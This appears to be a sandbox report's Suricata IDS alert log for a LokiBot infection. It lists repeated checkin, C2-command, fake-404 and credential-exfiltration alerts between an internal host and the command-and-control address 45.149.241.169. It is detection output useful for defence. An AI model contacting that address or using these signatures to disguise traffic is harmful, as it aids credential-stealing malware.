Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64362 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64402
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64410 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64398 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64407 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64404
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64376 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64420 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64395 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49718 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64395
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64398
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64364 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64422 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64422
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.11:49712 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64407
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:55843 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64367 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64420
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64367
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64372 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64435 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64435
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64409 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64361 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64410
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64369 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64400 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64365 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64376
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64365
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64416 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64416
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64390 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64423 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64409
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64423
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49714 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64449 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64369
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64442 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64368 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64400
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64364
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64424 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64442
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64403 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64408 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64396 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64424
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64374 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64412 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64396
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64437 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64385 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64363 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64412
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64363
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64445 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64408
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:49713 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64433 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.11:64433
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.11:64432 -> 45.149.241.169:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.11:64368 -> 45.149.241.169:80
